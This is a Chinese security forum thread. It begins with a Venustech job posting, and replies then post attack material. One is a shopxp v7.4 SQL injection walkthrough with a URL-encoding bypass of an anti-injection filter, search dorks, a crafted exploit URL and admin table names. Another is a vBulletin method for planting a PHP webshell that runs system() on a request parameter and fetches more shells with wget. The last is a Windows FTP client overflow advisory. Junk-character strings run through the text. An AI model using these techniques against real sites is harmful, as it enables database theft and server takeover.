返回列表 发帖
  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: liu_yanhua@venustech.com.cn
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    岗位:备机库主管* A9 c2 q2 Z0 B4 T% v/ I( A
    - `* Q% \/ Z; N7 G, {
    . r& K) q% b& T& N, m0 h
    岗位职责:" v- p0 b3 O6 W7 @' @
    % A' ~& t, }# L" h
    1.负责公司产品备机库的管理。
    9 `3 M# z# a0 u9 K) a% l% Z0 s4 u5 i9 ~" a) g5 }
    2.产品安装调试。+ q" H' y/ A8 Z% ~% ^

    , M# w) B( ~# T3 f& X0 j5 A- J0 d3.对备机使用情况做统计分析。
    * m, [# w, f! G5 U7 d$ k9 ]3 M( T! ?! E3 x" |
    岗位要求:
    2 ~+ V. _8 j5 Q7 H0 i7 ], a1 v9 e2 f. Q8 g2 x- M3 n% J2 j
    1.熟悉客户关系管理、网络安全相关知识;了解数据统计分析技术。1 R  x* B. U8 T

    ) G" Q4 [# w1 V9 j2.熟悉路由器、交换机等常用网络设备。
    6 P% r" _8 a3 B' R$ e0 H- E
    " z, K$ \8 v* T3 y) f3.熟悉防火墙、VPN等常见网络安全产品。
    8 z# j- N/ ^: K1 V' I9 y( @0 V6 f. L0 g8 \$ o+ I
    4.了解计算机硬件相关知识。" l' r# M& ~( k
    - h: u. o* i6 G
    5.一年以上硬件技术支持经验,有网络安全行业经验优先考虑。
    5 C2 ]$ c3 Z: p' c
    ; J& t) _) O. A; {/ d! O* p6.有较强的责任心,有敬业精神,有良好的沟通能力、动手能力,有团队合作精神,学习能力强。5 S( e0 `4 s/ @; }' n
    - C" q0 m" U# R, Y% ^; w; ^
    发送简历

     

    您可能还想看的主题:

    浙江政安信息安全研究中心招贤纳士啦!

    启明星辰研发招聘

    合优网站管理系统存在SQL注射。。。原创首发~

    联想研究院 安全职位

    PHP VS ASP

    计算机硬件维护知识

    1

    评分人数

      • webmaster: 楼主MJJ威望 + 30 金钱 + 200 金
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    shopxp v7.4 SQL注入漏洞
    shopxp网上购物系统 v7.4存在Sql注入漏洞。问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp问题代码:<% , f2 A2 b0 X: p/ C! f+ l
    dim shopxpbe_id, anclassname, shopxpse_id, nclassnamedim totalPut dim CurrentPage, TotalPages
    ' b( F9 }% S# d7 }
    if request("shopxpbe_id")<>"" thenshopxpbe_id=request("shopxpbe_id")elseshopxpbe_id=0end ifif request("shopxpbe_id")="" then shopxpbe_id=1end ifif not isempty(request("page")) thencurrentPage=cint(request("page"))elsecurrentPage=1end if

    - y5 m+ p2 d( g# \# A5 x: Q- z
    set rs=server.createobject("adodb.recordset")rs.open "select * from shopxp_btype where shopxpbe_id="&amp;shopxpbe_id,conn,1,1anclassname=rs("shopxpbe_name")rs.close%>并没有对shopxpbe_id进行整形判断。下面在说说他的防注入系统。好像是网上的枫叶防注入。看代码吧:Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_ZxFy_Cl = 2 '处理方式:1=提示信息,2=转向页面,3=先提示再转向Fy_Zx = "../" '出错时转向的页面On Error Resume NextFy_Url=Request.ServerVariables("QUERY_STRING")Fy_a=split(Fy_Url,"&amp;")redim Fy_Cs(ubound(Fy_a))On Error Resume Nextfor Fy_x=0 to ubound(Fy_a)Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)NextFor Fy_x=0 to ubound(Fy_Cs)If Fy_Cs(Fy_x)<>"" ThenIf Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 ThenSelect Case Fy_Cl省略部分代码
    9 r4 x) u$ s4 ~( y
    这个防注入系统在网上貌似很火,但是他防的是有问题的。关键是这句,Fy_Url=Request.ServerVariables("QUERY_STRING"),Request.ServerVariables得到的数据是原样的,并不会进行URL解码。这也就导致可以进行URL编码绕过这个防注入。以下是lake2对这段代码的分析:
    & m  Z" }* c4 p1 F7 l
    “它的思路就是先获得提交的数据,以“&amp;”为分界获得并处理name/value组,然后判断value里是否含有定义的关键字(这里为求简便,我只留下了“and”),有之,则为注射。

    ! ^7 O1 N  a$ }' n/ o1 M" H
    乍一看去,value被检查了,似乎没有问题。呵呵,是的,value不会有问题,可是,name呢?

    $ d) O% }2 f  q4 s
    它的name/value组值来自于Request.ServerVariables("QUERY_STRING"),呵呵,不好意思,这里出问题了。Request.ServerVariables("QUERY_STRING")是得到客户端提交的字符串,这里并不会自动转换url编码,哈哈,如果我们把name进行url编码再提交的话,呵呵,那就可以绕过检查了。比如参数是ph4nt0m=lake2 and lis0,此时程序能够检测到;如果提交%50h4nt0m=lake2 and lis0(对p进行url编码),程序就会去判断%50h4nt0m的值,而%50h4nt0m会被转换为ph4nt0m,所以%50h4nt0m值为空,于是就绕过了检测。
    ! E% W) t* b' ^- y/ O* n7 }
    等等,为什么既然name不解码可以绕过检查而value就不能绕过呢?因为value的值取自Request(Fy_Cs(Fy_x)),这个服务器就会解码的。
    * |! e* W  i3 p) g
    程序怎么改进呢?只要能够得到客户端提交的数据是解码后的就可以了,把得到name的语句改为For Each SubmitName In Request.QueryString就可以了。”
    / m$ d: `$ z! F) X2 P7 I
    下面说下利用:Google:inurl:xpCatalog_xpDesc.asp?action_key_order=biginurl:Catalog_Desc.asp?action_key_order=big (这个貌似是商业版的)构造如下地址:http://www.sitedir.com.cn/xpCatalog_xpDesc.asp?action_key_order=big&amp;shopxpbe_%69d=79 (对i进行URL编码),交给工具 手动添加表名:shopxp_admin 和shop_admin(商业版的)默认后台是 admin_shopxp 或者admin
    ! k& W1 m" {2 Q

    2 s7 `  r, }$ h
    # u& {! Y9 L, p5 s/ Y1 _9 U+ e- R; b* T4 b
    ' r8 H. @  Z% w. z$ y, C
    + Z9 f- p# ]7 u5 Q! C; `
    5 h) y9 ]% Y! D* l

    $ s0 Y& A4 q, o  {0 b+ s/ d) z
    6 X& X* F0 m& H! }2 B# a0 @0 [; j7 N, X( f% R2 w
    # D( o  n" ]1 M! y8 X  J/ B; Z

    ! @; K6 O4 q( H/ c: k
    ) Z! g+ @6 Y5 ?+ @% G; N% g& `+ W: p1 l* v3 r7 O" X

    : K' r; w5 b/ G% e0 r) Y
    0 `" m! Y" i: S4 p& X# K: @+ y' ]. C

    2 C6 v" c( k7 l& J
    % \1 T( k6 F. g& }( T7 `公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    vBulletin后台获取webshell方法总结
    方法一:% y6 ~9 M0 f. V8 j+ o
    首先在“插件和产品”(Plugins and Products)下边选择插件管理(Plugin Manager),然后右边选择添加新插件(Add New Plugin),在“Hook Location”(不知道杂翻译)处选择ajax_complete,Title处随便写,比如JK7OSE,然后关键的地方到了“Plugin PHP Code”(插件PHP代码),输入if(isset($_GET['jkrose'])){echo "<h1>jkrose</h1><pre>"; system($_GET['jkrose']);exit;}注意,是去掉PHP的<? ?>标记的,这样就算完成了,利用时只需ajax.php?jkrose=cmd命令,可以wget一个webshell,可以ls -la,cat filename等YY的事。, E: m: J; \$ f0 G7 k

    % |/ y% R( n! I9 Q方法二:) k4 a- j. b# w1 `3 r/ y+ R) F
    前边相同,代码处写一个接收上传的代码:

      L( K' c- Q) _4 F
    $target_path = "images/avatars"; //注意权限要为可写的

    ' I# F) V# Z; g/ M$ D4 h2 i
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
    ; x' H; q% l3 E& c) p' b) h9 G/ ], `
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 8 J& T0 A9 [: |5 @) Y8 e, W4 P
        echo "The file ". basename( $_FILES['uploadedfile']['name']).
    + M0 I, Y) W8 T8 h    " has been uploaded";
    + u1 Z/ U  F2 X  K4 v: _5 [} else{ , ^) U1 @: X8 m! j) o, W# U8 S+ W5 l
        echo "There was an error uploading the file, please try again!";
    ( @& a, w! t! _  G; c0 f% B}

    - d. C% y( N$ B5 v6 i* o
       然后访问ajax.php会提示“No input File Specified”之类的,如果没出现的话那肯定时哪有问题了,如果出现了就继续下边的,在网站随便某个地方,只要能写HTML代码就行,写个上传,比如说模板编辑那些地方,写个上传代码:

    . H, ]' d( H% z; ^
    <form enctype="multipart/form-data" action="ajax.php" method="POST">
    5 i2 ~2 r6 R& W<input type="hidden" name="MAX_FILE_SIZE" value="100000" /> ! w; Q# [3 y$ a$ b5 D9 p! l
    Choose a file to upload: <input name="uploadedfile" type="file" /><br /> % x) k, _( Q/ A. L* Y
    <input type="hidden" name="s" value="$session[sessionhash]" />
    0 f- B- r5 B$ x<input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" /> 5 p$ H( o3 X$ A7 r3 \, C
    <input type="submit" value="Upload File" />
    ; X+ p$ I; H2 |: Y! W! s+ b</form>
    6 E8 r+ J+ C  M. {. g) q$ q, ]& f
    保存就完工了,最后如果时新添加的风格的话,要在网站左下角切换过来才能用
    5 ^; [$ D- H4 h! H/ k% o
    / W5 y9 d1 ^* r1 c# y5 ?3 X
    / |# C* L" p& `' O
    $ M+ K9 V! F/ d% d- _8 n

    / Y0 A3 o! x9 k# |7 J/ n4 g( i8 z5 y3 f. U
    * c2 `- \  i3 r# J& u5 z

      Y* T% e! J; v) [4 |
    ( N3 ], A) S; U" S; O) z( b- f
    2 y) q! Y9 [/ n+ x% [) Q/ ?$ u- E$ E' G/ R
    ' |% m7 k: p3 g" Q4 P0 A! D

    * v- k: l. D0 a% d) U/ b1 H" @# a$ U' [8 z, O0 F+ T8 {

    ) R* D! q+ V+ N. Z" d
    , x0 K5 J: I$ Q# Q& p8 n
    : s$ u2 ?2 i8 x, w! U* M; A$ J. M: {, |

    & u3 e7 g8 q0 L' ^% N6 i/ _
    1 t, V. W) M: n6 Q6 y9 [$ W
    8 \& k9 D  q$ r# v: g公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Microsoft Windows FTP客户端有多个远程溢出漏洞
    受影响系统:Microsoft Windows XPMicrosoft Windows 2000SP4Microsoft Windows 2000 Server SP4
    1 n& n2 x6 X7 f+ Q
    描述:
    ! ?8 k1 i: s5 Z& {+ G) k
    Microsoft Windows是微软发布的非常流行的操作系统。

    * P5 F, C9 u  L0 e* ]0 T
    Windows系统自带的FTP客户端实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制客户端。

    ! }; Y! u$ K+ H$ n; |
    Windows操作系统所捆绑的FTP客户端没有正确地验证mget、dir、user、password、ls等命令,如果用户使用FTP客户端连接到了FTP服务器上带有超长文件夹名或文件名的目录并发布了上述命令的话,就可以触发缓冲区溢出,导致拒绝服务或执行任意指令。但这个漏洞较难利用,因为需要社会工程学且必须以有漏洞命令参数的形式注入shellcode。

    1 r! k. r! z/ E0 g6 U/ Y) c
    厂商补丁:
    ; A/ x) J8 I9 [* p# X
    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
    : v- R* D1 w4 j& R+ e
    http://www.microsoft.com/technet/security/
    5 p3 {1 A& U! ~" T0 s% k

    : @4 R! d) P3 P2 k8 H8 U) K: l' E
    ) O4 C, P2 w1 D" a) G* C
    $ R  p9 ?1 Z6 f. a% p' g- j$ w' P/ W+ c2 h
    # u) N9 c, h7 Q. H$ `, A4 R6 _; k
    ' T  V4 b; ]. w5 e
    9 x2 ^7 l! N6 f  n4 Z( f  W
    " `( K5 L3 @7 H1 @! w* i+ F$ t

    / C/ O3 F# @6 K. Z4 r4 L$ Z* k* B* n4 E( q7 {) }" Y

      L/ J* ?+ O$ _& Z! D/ |, T/ G; r5 X, a" a2 D

    + T* i5 `' v( q4 L# t; b. J( `  k) X2 T( f2 D0 d$ N
    1 T$ R& h4 v. z/ g: ?1 w2 a3 i; y2 _
    0 X; ]" c/ X2 e3 @

    : M3 l' Z9 c& ?! M. N" p% [) ~- t/ Q2 a2 r
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表